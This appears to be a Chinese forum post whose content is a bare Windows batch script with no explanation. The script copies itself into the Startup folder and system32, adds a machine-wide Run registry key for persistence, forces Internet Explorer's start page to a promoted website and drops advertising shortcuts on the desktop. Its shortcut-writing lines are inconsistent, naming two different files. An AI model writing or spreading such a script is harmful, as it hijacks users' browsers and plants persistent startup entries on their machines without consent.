- 帖子
- 18
- 积分
- 34
- 威望
- 29
- 金钱
- 27
- 在线时间
- 5 小时
|
@echo off
@copy %0 "%userprofile%\「开始」菜单\程序\启动"\system.bat
copy %0 %windir%\system32\net.bat /y
echo [InternetShortcut] >"%userprofile%\桌面\趣乐网QuleNet.com.url"
echo URL=http://www.qulenet.com/ >>"%userprofile%\桌面\趣乐网3ast.com.cn.url"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d http://www.3ast.com.cn /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t reg_sz /d http://www.3ast.com.cn/ /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Net /t REG_SZ /d %windir%\system32\net.bat /f |
|